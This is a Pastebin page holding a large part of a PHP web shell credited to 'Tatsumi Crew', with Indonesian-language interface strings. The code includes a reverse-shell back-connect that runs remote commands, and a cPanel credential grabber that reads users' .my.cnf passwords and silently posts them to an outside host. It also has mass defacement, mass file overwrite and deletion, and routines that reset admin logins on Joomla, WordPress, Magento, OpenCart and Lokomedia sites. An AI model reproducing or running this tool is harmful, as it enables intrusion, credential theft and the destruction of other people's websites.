Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- if($_POST['backconnect'] == 'php') {
- $ip = $_POST['server'];
- $port = $_POST['port'];
- $sockfd = fsockopen($ip , $port , $errno, $errstr );
- if($errno != 0){
- echo "<font color='red'>$errno : $errstr</font>";
- } else if (!$sockfd) {
- $result = "<p>Unexpected error has occured, connection may have failed.</p>";
- } else {
- fputs ($sockfd ,"
- \n{################################################################}
- \n..:: BackConnect Php By tatsumi ::..
- \n{################################################################}\n");
- $dir = shell_exec("pwd");
- $sysinfo = shell_exec("uname -a");
- $time = Shell_exec("time");
- $len = 1337;
- fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "\n\n");
- while(!feof($sockfd)){ $cmdPrompt = '[tatsumi]#:> ';
- fputs ($sockfd , $cmdPrompt );
- $command= fgets($sockfd, $len);
- fputs($sockfd , "\n" . shell_exec($command) . "\n\n");
- }
- fclose($sockfd);
- }
- }
- echo "</p></div>";
- } elseif($_GET['jancok'] == 'adminer') {
- $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
- function adminer($url, $isi) {
- $fp = fopen($isi, "w");
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
- curl_setopt($ch, CURLOPT_FILE, $fp);
- return curl_exec($ch);
- curl_close($ch);
- fclose($fp);
- ob_flush();
- flush();
- }
- if(file_exists('adminer.php')) {
- echo "<center><font color=white><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
- } else {
- if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
- echo "<center><font color=white><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
- } else {
- echo "<center><font color=red>gagal buat file adminer</font></center>";
- }
- }
- }
- elseif($_GET['do'] == 'cmd') {
- if($_POST['do_cmd']) {
- echo "<pre>".exe($_POST['cmd'])."</pre>";
- }
- }
- elseif($_GET['jancok'] == 'cpanel') {
- @ini_set('display_errors',0);
- function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
- $ar0=explode($marqueurDebutLien, $text);
- $ar1=explode($marqueurFinLien, $ar0[$i]);
- return trim($ar1[0]);
- }
- echo '<br><br><style>
- textarea {
- resize:none;
- color:black;
- background-color:#ffffff;
- font-size:8pt; color:black;
- border:1px solid white ;
- border-left: 4px solid white ;
- }
- input {
- color: black;
- border:1px dotted white;
- }
- </style>';
- echo '<center>';
- $d0mains = @file('/etc/named.conf');
- $domains = scandir("/var/named");
- if ($domains or $d0mains)
- {
- $domains = scandir("/var/named");
- if($domains) {
- echo "<table align=center><tr><th valign=top class=style2> COUNT </th><th valign=top > DOMAIN </th><th valign=top class=style2 > USER </th><th valign=top class=style2 > Password </th><th valign=top class=style2 > .my.cnf </th></tr>";
- $count=1;
- $dc = 0;
- $list = scandir("/var/named");
- foreach($list as $domain){
- if(strpos($domain,".db")){
- $domain = str_replace('.db','',$domain);
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- $dirz = '/home/'.$owner['name'].'/.my.cnf';
- $path = getcwd();
- if (is_readable($dirz)) {
- copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
- $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
- $password=entre2v2($p,'password="','"');
- echo "<tr><td valign=top style=border :2px solid white; width: 139px class=style2>".$count++."</td><td valign=top style= width: 139px; border :2px solid white class=style2 ><a href=http://".$domain.":2082 target=_blank>".$domain."</a></td><td valign=top style= width: 139px; border: 2px solid white class=style2 >".$owner['name']."</td><td valign=top style= width: 139px; border: 2px solid white class=style2 >".$password."</td><td valign=top style=border :2px solid white style=width: 139px><a href=".$owner['name'].".txt target=_blank>Click Here</a></td></tr>";
- $dc++;
- $success3="http://".$domain."|".$owner['name']."|".$password."\n";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL,"http://ww3s.ws/ok.php");
- curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"result=".base64_encode($success3));
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 1);
- $buffer = curl_exec($ch);
- }
- }
- }
- echo '</table>';
- $total = $dc;
- echo '</center>';
- }else{
- $d0mains = @file('/etc/named.conf');
- if($d0mains) {
- echo "<table align=center><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
- $count=1;
- $dc = 0;
- $mck = array();
- foreach($d0mains as $d0main){
- if(@eregi('zone',$d0main)){
- preg_match_all('#zone "(.*)"#',$d0main,$domain);
- flush();
- if(strlen(trim($domain[1][0])) >2){
- $mck[] = $domain[1][0];
- }
- }
- }
- $mck = array_unique($mck);
- $usr = array();
- $dmn = array();
- foreach($mck as $o) {
- $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
- $usr[] = $infos['name'];
- $dmn[] = $o;
- }
- array_multisort($usr,$dmn);
- $dt = file('/etc/passwd');
- $passwd = array();
- foreach($dt as $d) {
- $r = explode(':',$d);
- if(strpos($r[5],'home')) {
- $passwd[$r[0]] = $r[5];
- }
- }
- $l=0;
- $j=1;
- foreach($usr as $r) {
- $dirz = '/home/'.$r.'/.my.cnf';
- $path = getcwd();
- if (is_readable($dirz)) {
- copy($dirz, ''.$path.'/'.$r.'.txt');
- $p=file_get_contents(''.$path.'/'.$r.'.txt');
- $password=entre2v2($p,'password="','"');
- echo "<tr><td valign=top class=style2 style=width: 139px>".$count++."</td><td valign=top class=style2 style=width: 139px><a target=_blank href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td valign=top class=style2 style=width: 139px>'.$r."</td><td valign=top class=style2 style=width: 139px>".$password."</td><td valign=top class=style2 style=width: 139px><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
- $dc++;
- flush();
- $l=$l?0:1;
- $j++;
- }
- }
- }
- echo '</table>';
- $total = $dc;
- echo '<br><div class=result valign=top class=style2 style=width: 139px >Total cPanel Found = '.$total.'</h3><br />';
- echo '</center>';
- }
- }else{
- echo "<div class=result><i><font color=#FF0000>ERROR</font><br><font color=#FF0000>/var/named</font> or <font color=#FF0000>etc/named.conf</font> Not Accessible!</i></div>";
- }
- } elseif($_GET['jancok'] == 'mass') {
- echo "<center><form action=\"\" method=\"post\">\n";
- $dirr=$_POST['d_dir'];
- $index = $_POST["script"];
- $index = str_replace('"',"'",$index);
- $index = stripslashes($index);
- function edit_file($file,$index){
- if (is_writable($file)) {
- clear_fill($file,$index);
- echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
- }
- else {
- echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
- }
- }
- function hapus_massal($dir,$namafile) {
- if(is_writable($dir)) {
- $dira = scandir($dir);
- foreach($dira as $dirb) {
- $dirc = "$dir/$dirb";
- $lokasi = $dirc.'/'.$namafile;
- if($dirb === '.') {
- if(file_exists("$dir/$namafile")) {
- unlink("$dir/$namafile");
- }
- } elseif($dirb === '..') {
- if(file_exists("".dirname($dir)."/$namafile")) {
- unlink("".dirname($dir)."/$namafile");
- }
- } else {
- if(is_dir($dirc)) {
- if(is_writable($dirc)) {
- if(file_exists($lokasi)) {
- echo "[<font color=lime>DELETED</font>] $lokasi<br>";
- unlink($lokasi);
- $idx = hapus_massal($dirc,$namafile);
- }
- }
- }
- }
- }
- }
- }
- function clear_fill($file,$index){
- if(file_exists($file)){
- $handle = fopen($file,'w');
- fwrite($handle,'');
- fwrite($handle,$index);
- fclose($handle); } }
- function gass(){
- global $dirr , $index ;
- chdir($dirr);
- $me = str_replace(dirname(__FILE__).'/','',__FILE__);
- $files = scandir($dirr) ;
- $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
- sort($files);
- $n = 0 ;
- foreach ($files as $file){
- if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
- echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
- edit_file($file,$index);
- flush();
- $n = $n +1 ;
- }
- }
- echo "<br>";
- echo "<center><br><h3>$n Kali Anda Telah Ngecrot Disini </h3></center><br>";
- }
- function ListFiles($dirrall) {
- if($dh = opendir($dirrall)) {
- $files = Array();
- $inner_files = Array();
- $me = str_replace(dirname(__FILE__).'/','',__FILE__);
- $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
- while($file = readdir($dh)) {
- if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
- if(is_dir($dirrall . "/" . $file)) {
- $inner_files = ListFiles($dirrall . "/" . $file);
- if(is_array($inner_files)) $files = array_merge($files, $inner_files);
- } else {
- array_push($files, $dirrall . "/" . $file);
- }
- }
- }
- closedir($dh);
- return $files;
- }
- }
- function gass_all(){
- global $index ;
- $dirrall=$_POST['d_dir'];
- foreach (ListFiles($dirrall) as $key=>$file){
- $file = str_replace('//',"/",$file);
- echo "<center><strong>$file</strong> ===>";
- edit_file($file,$index);
- flush();
- }
- $key = $key+1;
- echo "<center><br><h3>$key Kali Anda Telah Ngecrot Disini </h3></center><br>"; }
- function sabun_massal($dir,$namafile,$isi_script) {
- if(is_writable($dir)) {
- $dira = scandir($dir);
- foreach($dira as $dirb) {
- $dirc = "$dir/$dirb";
- $lokasi = $dirc.'/'.$namafile;
- if($dirb === '.') {
- file_put_contents($lokasi, $isi_script);
- } elseif($dirb === '..') {
- file_put_contents($lokasi, $isi_script);
- } else {
- if(is_dir($dirc)) {
- if(is_writable($dirc)) {
- echo "[<font color=lime>DONE</font>] $lokasi<br>";
- file_put_contents($lokasi, $isi_script);
- $idx = sabun_massal($dirc,$namafile,$isi_script);
- }
- }
- }
- }
- }
- }
- if($_POST['mass'] == 'onedir') {
- echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
- $ini="http://";
- $mainpath=$_POST[d_dir];
- $file=$_POST[d_file];
- $path=opendir("$mainpath");
- $code=base64_encode($_POST[script]);
- $indx=base64_decode($code);
- while($row=readdir($dir)){
- $start=@fopen("$row/$file","w+");
- $finish=@fwrite($start,$indx);
- if ($finish){
- echo"$ini$row/$file\n";
- }
- }
- echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
- $mainpath=$_POST[d_dir];$file=$_POST[d_file];
- $path=opendir("$mainpath");
- $code=base64_encode($_POST[script]);
- $indx=base64_decode($code);
- while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
- $finish=@fwrite($start,$indx);
- if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
- }
- }
- elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
- elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
- elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
- elseif($_POST['mass'] == 'massdeface') {
- echo "<div style='margin: 5px auto; padding: 5px'>";
- sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
- echo "</div>"; }
- else {
- echo "
- <center><font style='text-decoration: underline;'>
- Select Type:<br>
- </font>
- <select class=\"select\" name=\"mass\" style=\"width: 450px;\" height=\"10\">
- <option value=\"onedir\">Mass Deface 1 Dir</option>
- <option value=\"massdeface\">Mass Deface ALL Dir</option>
- <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
- <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
- <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
- <font style='text-decoration: underline;'>Folder:</font><br>
- <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
- <font style='text-decoration: underline;'>Filename:</font><br>
- <input type='text' name='d_file' value='ngeue.php' style='width: 450px;' height='10'><br>
- <font style='text-decoration: underline;'>Index File:</font><br>
- <textarea name='script' style='width: 450px; height: 200px;'>Hacked By Tatsumi Crew</textarea><br>
- <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
- </form></center>";
- }
- }elseif($_GET['mass'] == 'changer') {
- if($_POST['sikat']) {
- echo "<center><h1>Config Reset Password</h1>
- <form method='post'>
- Link Config: <br>
- <textarea name='link' style='width: 450px; height:250px;'>";
- GrabUrl($_POST['linkconfig'],'txt');
- echo"</textarea><br>
- User Baru : <input type='text' name='newuser' placeholder='tatsumi'> <br><br>
- Password Baru : <input type='text' name='newpasswd' placeholder='tatsumi'><br><br>
- <input type='submit' style='width: 450px;' name='masschanger' value='Hajar!!'>
- </form></center>";
- }else {
- echo '<center>
- <h1>Config Reset Password</h1>
- <form method="post">
- </select><br>
- Link Config :<br>
- <input type="text" name="linkconfig" height="10" style="width: 450px;" placeholder="http://jembod.com/tatsumi_symconf/"><br>
- </br>
- <input type="submit" style="width: 450px;" name="sikat" value="Change User!!">
- </form></center>';
- }
- if($_POST['masschanger']) {
- $user = $_POST['newuser'];
- $pass = $_POST['newpasswd'];
- $passx = md5($pass);
- $link = explode("\r\n", $_POST['link']);
- foreach($link as $file_conf) {
- $config = file_get_contents($file_conf);
- if(preg_match("/JConfig|joomla/",$config)) {
- $dbhost = ambilkata($config,"host = '","'");
- $dbuser = ambilkata($config,"user = '","'");
- $dbpass = ambilkata($config,"password = '","'");
- $dbname = ambilkata($config,"db = '","'");
- $dbprefix = ambilkata($config,"dbprefix = '","'");
- $prefix = $dbprefix."users";
- $conn = mysql_connect($dbhost,$dbuser,$dbpass);
- $db = mysql_select_db($dbname);
- $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
- $result = mysql_fetch_array($q);
- $id = $result['id'];
- $site = ambilkata($config,"sitename = '","'");
- $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
- echo "CMS: Joomla<br>";
- if($site == '') {
- echo "Sitename => <font color=red>Error Cok</font><br>";
- } else {
- echo "Sitename => $site<br>";
- }
- if(!$update OR !$conn OR !$db) {
- echo "[-] <font color=red>".mysql_error()."</font><br><br>";
- } else {
- echo "[+] username: <font color=lime>$user</font><br>";
- echo "[+] password: <font color=lime>$pass</font><br><br>";
- }
- mysql_close($conn);
- } elseif(preg_match("/WordPress/",$config)) {
- $dbhost = ambilkata($config,"DB_HOST', '","'");
- $dbuser = ambilkata($config,"DB_USER', '","'");
- $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
- $dbname = ambilkata($config,"DB_NAME', '","'");
- $dbprefix = ambilkata($config,"table_prefix = '","'");
- $prefix = $dbprefix."users";
- $option = $dbprefix."options";
- $conn = mysql_connect($dbhost,$dbuser,$dbpass);
- $db = mysql_select_db($dbname);
- $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
- $result = mysql_fetch_array($q);
- $id = $result[ID];
- $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
- $result2 = mysql_fetch_array($q2);
- $target = $result2[option_value];
- if($target == '') {
- $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
- } else {
- $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
- }
- $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE id='$id'");
- echo "CMS: Wordpress<br>";
- echo $url_target;
- if(!$update OR !$conn OR !$db) {
- echo "[-] <font color=red>".mysql_error()."</font><br><br>";
- } else {
- echo "[+] username: <font color=lime>$user</font><br>";
- echo "[+] password: <font color=lime>$pass</font><br><br>";
- }
- mysql_close($conn);
- } elseif(preg_match("/Magento|Mage_Core/",$config)) {
- $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
- $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
- $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
- $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
- $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
- $prefix = $dbprefix."admin_user";
- $option = $dbprefix."core_config_data";
- $conn = mysql_connect($dbhost,$dbuser,$dbpass);
- $db = mysql_select_db($dbname);
- $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
- $result = mysql_fetch_array($q);
- $id = $result[user_id];
- $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
- $result2 = mysql_fetch_array($q2);
- $target = $result2[value];
- if($target == '') {
- $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
- } else {
- $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
- }
- $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE user_id='$id'");
- echo "CMS: Magento<br>";
- echo $url_target;
- if(!$update OR !$conn OR !$db) {
- echo "[-] <font color=red>".mysql_error()."</font><br><br>";
- } else {
- echo "[+] username: <font color=lime>$user</font><br>";
- echo "[+] password: <font color=lime>$pass</font><br><br>";
- }
- mysql_close($conn);
- } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
- $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
- $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
- $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
- $dbname = ambilkata($config,"'DB_DATABASE', '","'");
- $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
- $prefix = $dbprefix."user";
- $conn = mysql_connect($dbhost,$dbuser,$dbpass);
- $db = mysql_select_db($dbname);
- $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
- $result = mysql_fetch_array($q);
- $id = $result[user_id];
- $target = ambilkata($config,"HTTP_SERVER', '","'");
- if($target == '') {
- $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
- } else {
- $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
- }
- $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE user_id='$id'");
- echo "CMS: OpenCart<br>";
- echo $url_target;
- if(!$update OR !$conn OR !$db) {
- echo "[-] <font color=red>".mysql_error()."</font><br><br>";
- } else {
- echo "[+] username: <font color=lime>$user</font><br>";
- echo "[+] password: <font color=lime>$pass</font><br><br>";
- }
- mysql_close($conn);
- } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
- $dbhost = ambilkata($config,'server = "','"');
- $dbuser = ambilkata($config,'username = "','"');
- $dbpass = ambilkata($config,'password = "','"');
- $dbname = ambilkata($config,'database = "','"');
- $prefix = "users";
- $option = "identitas";
- $conn = mysql_connect($dbhost,$dbuser,$dbpass);
- $db = mysql_select_db($dbname);
- $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
- $result = mysql_fetch_array($q);
- $target = $result[alamat_website];
- if($target == '') {
- $target2 = $result[url];
- $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
- if($target2 == '') {
- $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
- } else {
- $cek_login3 = file_get_contents("$target2/adminweb/");
- $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
- if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
- $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
- } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
- $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
- } else {
- $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
- }
- }
- } else {
- $cek_login = file_get_contents("$target/adminweb/");
- $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
- if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
- $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
- } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
- $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
- } else {
- $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
- }
- }
- $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE level='admin'");
- echo "CMS: Lokomedia<br>";
- if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
- echo $url_target2;
- } else {
- echo $url_target;
- }
- if(!$update OR !$conn OR !$db) {
- echo "[-] <font color=red>".mysql_error()."</font><br><br>";
- } else {
- echo "[+] username: <font color=lime>$user</font><br>";
- echo "[+] password: <font color=lime>$pass</font><br><br>";
- }
- mysql_close($conn);
- }
- }
- }
- }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
- echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
- if($_POST['opt'] == 'chmod'){
- if(isset($_POST['perm'])){
- if(chmod($_POST['path'],$_POST['perm'])){
- echo '<font color="green">Success !</font><br/>';
- }else{
- echo '<font color="red">Denied !</font><br />';
- }
- }
- echo '<form method="POST">
- Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="chmod">
- <input type="submit" value="Go" />
- </form>';
- }
- elseif($_POST['opt'] == 'rename'){
- if(isset($_POST['newname'])){
- if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
- echo '<font color="green">Success !</font><br/>';
- }else{
- echo '<font color="red">Denied !</font><br />';
- }
- $_POST['name'] = $_POST['newname'];
- }
- echo '<form method="POST">
- New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="rename">
- <input type="submit" value="Go" />
- </form>';
- }elseif($_POST['opt'] == 'edit'){
- if(isset($_POST['src'])){
- $fp = fopen($_POST['path'],'w');
- if(fwrite($fp,$_POST['src'])){
- echo '<font color="green">Success !</font><br/>';
- }else{
- echo '<font color="red">Denied !</font><br/>';
- }
- fclose($fp);
- }
- echo '<form method="POST">
- <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="edit">
- <input type="submit" value="Save" />
- </form>';
- }
- echo '</center>';
- }else{
- echo '</table><br/><center>';
- if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
- if($_POST['type'] == 'dir'){
- if(rmdir($_POST['path'])){
- echo '<font color="green">Success !</font><br/>';
- }else{
- echo '<font color="red">Denied ! </font><br/>';
- }
- }elseif($_POST['type'] == 'file'){
- if(unlink($_POST['path'])){
- echo '<font color="green">Success</font><br/>';
- }else{
- echo '<font color="red">Denied</font><br/>';
- }
- }
- }
- echo '';
- $scandir = scandir($path);
- echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
- <tr>
- <tr class="first">
- <th class="th_home"><center>Name</center></th>
- <th class="th_home"><center>Size</center></th>
- <th class="th_home"><center>Permission</center></th>
- <th class="th_home"><center>Action</center></th>
- </tr>';
- foreach($scandir as $dir){
- if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
- echo '<tr>
- <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
- <td><center>--</center></td>
- <td><center>';
- if(is_writable($path.'/'.$dir)) echo '<font color="green">';
- elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
- echo perms($path.'/'.$dir);
- if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
- echo '
- <td><center><form method="POST" action="?option&path='.$path.'">
- <select name="opt">
- <option value="">Select</option>
- <option value="delete">Delete</option>
- <option value="chmod">Chmod</option>
- <option value="rename">Rename</option>
- </select>
- <input type="hidden" name="type" value="dir">
- <input type="hidden" name="name" value="'.$dir.'">
- <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
- <input type="submit" value=">">
- </form></center></td>
- </tr>';
- }
- echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
- foreach($scandir as $file){
- if(!is_file($path.'/'.$file)) continue;
- $size = filesize($path.'/'.$file)/1024;
- $size = round($size,3);
- if($size >= 1024){
- $size = round($size/1024,2).' MB';
- }else{
- $size = $size.' KB';
- }
- echo '<tr>
- <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
- <td><center>'.$size.'</center></td>
- <td><center>';
- if(is_writable($path.'/'.$file)) echo '<font color="green">';
- elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
- echo perms($path.'/'.$file);
- if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
- echo '</center></td>
- <td><center><form method="POST" action="?option&path='.$path.'">
- <select name="opt">
- <option value="">Select</option>
- <option value="delete">Delete</option>
- <option value="chmod">Chmod</option>
- <option value="rename">Rename</option>
- <option value="edit">Edit</option>
- </select>
- <input type="hidden" name="type" value="file">
- <input type="hidden" name="name" value="'.$file.'">
- <input type="hidden" name="path" value="'.$path.'/'.$file.'">
- <input type="submit" value=">">
- </form></center></td>
- </tr>';
- }
- echo '</table>
- </div><br><br>';
- }
- echo "<br><hr color='#191919'><center>
- <form method='post' enctype='multipart/form-data'>
- <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($path,"Writeable")." ]
- <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
- </br>
- <input type='file' name='ix_file'>
- <input type='submit' value='upload2' name='upload'>
- </form>";
- echo $act;
- echo '
- <br><center><br/><font color="#0bfb04" size="3" face="Kavivanar">Copyright © '.date("Y").' </font></a><a href="http://www.tatsumi-crew.net" target="_blank"><font color="#0bfb04" size="3" face="Kavivanar">Arvan Apriyana</font></b></a></center>
- </body>
- <iframe width="0" height="0" src="https://www.youtube.com/embed/SUjvUN0vztY?rel=0&autoplay=1" frameborder="0" allowfullscreen>
- </iframe>
- </html>';
- ?>
Add Comment
Please, Sign In to add comment